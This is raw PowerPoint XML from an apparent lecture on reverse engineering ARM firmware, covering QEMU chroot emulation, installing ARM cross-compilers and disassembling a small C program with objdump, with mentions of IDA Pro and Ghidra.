              <a:rPr lang="en-US" sz="22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200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C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200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C980368D-3BE3-7A46-A5B7-0D4E5B36A72B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36314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189" y="462850"/>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1, beginning techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="635901" y="2492600"/>
            <a:ext cx="11112910" cy="4046312"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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Reverse engineering by inspection</a:t>
            </a:r>
          </a:p>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Getting specs</a:t>
            </a:r>
          </a:p>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Getting software</a:t>
            </a:r>
          </a:p>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Interacting with cloud services</a:t>
            </a:r>
          </a:p>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Analyzing firmware packages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Rooting firmware</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7957A8AF-0E75-4044-B3BB-6A7AA40E0465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1818947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err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Qemu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> user binaries</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374073" y="1770306"/>
            <a:ext cx="11479260" cy="40624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Chroot with QEMU in Debian/Ubuntu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mount my target filesystem on /mnt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>mount -o loop fs.img /mnt</a:t>
            </a:r>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Copy the static ARM binary that provides emulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1257300" lvl="2" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>cp /usr/bin/qemu-arm-static /mnt/usr/bin</a:t>
            </a:r>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chroot into /mnt, then run 'qemu-arm-static bash’, This chroots; runs the emulator; and the emulator runs bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>chroot /mnt qemu-arm-static /bin/bash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28D7BCF9-6411-6A46-B559-EF712CBFA71F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184669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Cross compile programs for ARM</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491067" y="1995057"/>
            <a:ext cx="11226684" cy="41840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To install the cross compiling tools, do the following:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">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gcc </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">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gcc-arm-linux-gnueabi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">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 install g++-arm-linux-gnueabi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">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apt install binutils-arm-linux-gnueabi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>You can compile, link, objdump, etc using the arm supported binaries:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>arm-linux-gnueabi-gcc helloworld.c -o helloworld-arm -static</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l" fontAlgn="base">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>file helloworld-arm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="l" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>helloworld-arm: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=1aec53a65fdd71ec68e761b5ef4cd2fae6e4e75c, not stripped</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-34290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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="109057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81" y="219404"/>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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1794931"/>
            <a:ext cx="11003280" cy="4843665"/>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arm-linux-gnueabihf-objdump -d add.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--disassemble.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Display the assembler mnemonics for the machine instructions from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. This option only disassembles those sections which are expected to contain instructions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>--disassemble-all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Like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but disassemble the contents of all sections, not just those expected to contain instructions.  If the target is an ARM architecture this switch also has the effect of forcing the disassembler to decode pieces of data found in code sections as if they were instructions.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fromelf --cpu=Cortex-A7 --disassemble --output=outfile.asm infile.axf</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Interactive debuggers are often much more convenient for diassembling large programs.  The most popular interactive debugger is IDA Pro it runs on Windows, Linux, or Mac OS X. See,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solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>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NSA has released a new reverse engineering tool called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Ghidra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>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We’ll look at this later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US"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6610692B-4A54-E144-953A-4AD972EB4BDA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="212391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09" y="127574"/>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- 1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="440575" y="1956150"/>
            <a:ext cx="4990407"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First lets do it for Intel architecture.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Here is a program (in test1.c):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#include &lt;stdio.h&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>int callee(int a) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  a += 120;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  return a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void caller(int a) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  int c = callee(a);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  printf("%d\n", c);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30E759B1-F499-8442-AEEE-B273FD1E21E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6089800" y="2066986"/>
            <a:ext cx="5920048"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latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Compile it: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>g++ -c test1.cc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This will produce an object file, test1.o</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Now run objdump:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>objdump -disassemble-all test1.o</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output is on the next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33677CD7-6AE4-9640-BD99-3908733878E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{DD7197BE-A01B-AB4B-8C3B-F764F7D52191}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1331128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80" y="0"/>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- 2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="595036" y="2058035"/>
            <a:ext cx="11017135" cy="4298315"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Disassembly of section __TEXT,__text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__Z6calleei:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
